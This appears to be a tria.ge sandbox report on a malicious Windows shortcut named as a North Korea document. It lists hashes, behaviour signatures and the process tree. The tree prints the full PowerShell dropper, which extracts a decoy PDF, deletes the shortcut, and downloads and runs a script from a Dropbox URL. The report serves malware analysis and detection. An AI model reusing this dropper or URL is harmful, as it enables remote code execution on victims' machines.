Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
12/03/2024, 16:22
General
-
Target
34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2.lnk
-
Size
1.7MB
-
MD5
21e6ec6dd1e6d3b7abfda04e9189d72d
-
SHA1
11db057a906824897c8fabcc42f0ba7f88e04f81
-
SHA256
34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2
-
SHA512
a741dc0b33a8ab2860f4279563b2baf29ab74e9f0d7a033fc39ffe3d0969d5e3cc8ec77b1e9ff4051a0ec83f267ff6ab2980bbafb90f3d7e4f5663ae4aac4190
-
SSDEEP
24576:b74C5wFv9TW5mFiS3h+nP8etAercYKyLgLgybuEDcqbzZBqnATq9HlMhwLo:QC6LBFiS301AYwsySED9bzyFghwM
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\*rshell.exe /s /b /od') do call %a -WindowStyle Minimized "$DirPath=Get-Location;if ($DirPath -Match 'System32' -or $DirPath -Match 'Program Files' -or $DirPath -eq '') { $DirPath = $env:TEMP; } $Files = Get-ChildItem -Path $DirPath -Recurse -Filter 'General view of North Korea 240226.lnk';$lnkFilePath = '';foreach ($File in $Files) {$lnkFilePath = $File.FullName;};$startAddress = 0; $fileBytes = Get-Content -Path $lnkFilePath -Encoding Byte -Raw;$a5=0x50;$b4=0x4b;$c3=0x03;$d4=0x04; for ($i = 0; $i -lt $fileBytes.Length; $i++){ if ($fileBytes[$i] -eq $a5){if ($fileBytes[$i+1] -eq $b4){if ($fileBytes[$i+2] -eq $c3){if ($fileBytes[$i+3] -eq $d4){$startAddress = $i + 4 ;break;}}}}}$byteCount = 24941643;$NormalFileName = $lnkFilePath -replace 'lnk', 'pdf';$selectedBytes = $fileBytes[$startAddress..($startAddress + $byteCount - 1)];Set-Content -Path $NormalFileName -Value $selectedBytes -Encoding Byte; ii $NormalFileName; $i = $i + $byteCount;for ($j = $i; $j -lt $fileBytes.Length; $j++){ if ($fileBytes[$j] -eq 0x55){if ($fileBytes[$j+1] -eq 0x8B){if ($fileBytes[$j+2] -eq 0xEC){if ($fileBytes[$j+3] -eq 0x83){$SecondAddress = $j;break;}}}}}$byteCount=889858; $Resource = $fileBytes[$SecondAddress..($SecondAddress + $byteCount - 1)];Remove-Item -Path $lnkFilePath -Recurse -Force; $webClient = New-Object Net.WebClient;$string = $webClient.DownloadString('https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0');$scriptBlock = [scriptblock]::Create($string);& $scriptBlock;" && cls &&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\*rshell.exe /s /b /od3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Minimized "$DirPath=Get-Location;if ($DirPath -Match 'System32' -or $DirPath -Match 'Program Files' -or $DirPath -eq '') { $DirPath = $env:TEMP; } $Files = Get-ChildItem -Path $DirPath -Recurse -Filter 'General view of North Korea 240226.lnk';$lnkFilePath = '';foreach ($File in $Files) {$lnkFilePath = $File.FullName;};$startAddress = 0; $fileBytes = Get-Content -Path $lnkFilePath -Encoding Byte -Raw;$a5=0x50;$b4=0x4b;$c3=0x03;$d4=0x04; for ($i = 0; $i -lt $fileBytes.Length; $i++){ if ($fileBytes[$i] -eq $a5){if ($fileBytes[$i+1] -eq $b4){if ($fileBytes[$i+2] -eq $c3){if ($fileBytes[$i+3] -eq $d4){$startAddress = $i + 4 ;break;}}}}}$byteCount = 24941643;$NormalFileName = $lnkFilePath -replace 'lnk', 'pdf';$selectedBytes = $fileBytes[$startAddress..($startAddress + $byteCount - 1)];Set-Content -Path $NormalFileName -Value $selectedBytes -Encoding Byte; ii $NormalFileName; $i = $i + $byteCount;for ($j = $i; $j -lt $fileBytes.Length; $j++){ if ($fileBytes[$j] -eq 0x55){if ($fileBytes[$j+1] -eq 0x8B){if ($fileBytes[$j+2] -eq 0xEC){if ($fileBytes[$j+3] -eq 0x83){$SecondAddress = $j;break;}}}}}$byteCount=889858; $Resource = $fileBytes[$SecondAddress..($SecondAddress + $byteCount - 1)];Remove-Item -Path $lnkFilePath -Recurse -Force; $webClient = New-Object Net.WebClient;$string = $webClient.DownloadString('https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0');$scriptBlock = [scriptblock]::Create($string);& $scriptBlock;"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6.2MB
-
Filesize
120KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
216KB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
6.5MB
-
Filesize
7.7MB